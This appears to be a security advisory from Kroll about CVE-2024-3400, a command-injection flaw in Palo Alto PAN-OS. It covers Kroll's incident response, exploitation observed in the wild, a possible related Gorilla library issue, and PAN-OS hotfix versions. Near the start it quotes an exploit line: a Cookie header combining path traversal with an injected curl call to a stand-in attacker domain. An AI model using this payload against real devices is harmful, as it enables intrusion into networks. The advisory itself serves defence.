On April 16, watchTowr posted a technical breakdown and proof of concept (POC) for the CVE-2024-3400, revealing the trivial nature of exploiting this vulnerability. The issue is caused by allowing arbitrary file writes via a path traversal string and command injection set in the session ID handle, which can be changed by an attacker by editing the Cookie parameter of their request.
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/hour/[arbitrarystring]`curl${IFS}attackerdomain.com`;
Copy
This will create an empty file in the “device_telemetry/hour” directory which is processed hourly, the logging service will action all requests in the directory each hour, and due to a failure to sanitize filenames, will execute the command in the filename, in the example above that is making a request to an attacker domain.
How Kroll is Responding
Kroll alerted clients to the threat on Friday, April 12, 2024. Since then, we have responded to suspected compromises surrounding this vulnerability. To address these concerns, our investigators have developed a standardized incident response approach. This includes:
- Collection, preservation and analysis of available and relevant log data.
- As available, collection and review of relevant IOCs from our client.
- Analysis includes comparison of the client provided data against Palo Alto and Kroll Cyber Threat Intelligence datasets.
- Provide our client with actionable leads to resolve identified security events (e.g., Level 0, Level 1, Level 2, or Level 3)
- Work with our client on recommendations regarding containment and remediation.
- Reach out to Kroll for more information on how our incident response team can support via our 24x7 hotlines or contact form.
Kroll Observations
Kroll has observed active, opportunistic exploitation of CVE-2024-3400 by numerous actors. Due to the ease of exploit and perfect positioning to further intrusions into a network this vulnerability serves as a high priority target for threat actors before the flaws are fixed.
Kroll observations show multiple methods of testing and exploring the vulnerability conducted from a highly geographically distributed range of IP addresses, which are being actively investigated and have been added to the Kroll IOC detection database. We do not see evidence of successful exploitation on patched devices.
Palo Alto provides CLI commands in their FAQ to identify indicators of attempted compromise.
Ongoing Investigation
Security researchers have identified that the path traversal exploit may be related to an open-source web framework “Gorilla”, which does not sanitize SessionIDs correctly, subsequently a fix was submitted to the repo. Kroll has not yet independently verified if this is the case, however the Gorilla library is certainly vulnerable to path traversal. As of April 18, 2024, a CVE has not been assigned. Gorilla is used by hundreds of other projects on GitHub and likely used as part of many other private codebases. Kroll is continuing to analyze the threat that this vulnerability could pose to other popular projects and products.
Recommendations
Below are some key recommendations from Kroll’s cyber threat intelligence (CTI) team:
- Patch Palo Alto devices to the latest version immediately.
- Palo Alto customers with a Threat Prevention subscription can block attacks for this vulnerability using Threat IDs 95187, 95189 and 95191 (available in Applications and Threats content version 8836-8695 and later). Please monitor this advisory and new Threat Prevention content updates for additional Threat Prevention IDs around CVE-2024-3400.
- This issue is fixed in hotfix releases of PAN-OS 10.2.9-h1, PAN-OS 11.0.4-h1, PAN-OS 11.1.2-h3, and in all later PAN-OS versions. Hotfixes for other commonly deployed maintenance releases will also be made available to address this issue. Please see details below for ETAs regarding the upcoming hotfixes.
- 10.2.9-h1 (Released 4/14/24)
- 10.2.8-h3 (Released 4/15/24)
- 10.2.7-h8 (Released 4/15/24)
- 10.2.6-h3 (Released 4/16/24)
- 10.2.5-h6 (Released 4/16/24)
- 10.2.3-h13 (ETA: 4/17/24)
- 10.2.1-h2 (ETA: 4/17/24)
- 10.2.2-h5 (ETA: 4/18/24)
- 10.2.0-h3 (ETA: 4/18/24)
- 10.2.4-h16 (ETA: 4/19/24)
- 11.0.4-h1 (Released 4/14/24)
- 11.0.3-h10 (Released 4/16/24)
- 11.0.2-h4 (Released 4/16/24)
- 11.0.1-h4 (ETA: 4/17/24)
- 11.0.0-h3 (ETA: 4/18/24)
- 11.1.2-h3 (Released 4/14/24)
- 11.1.1-h1 (Released 4/16/24)
- 11.1.0-h3 (Released 4/16/24)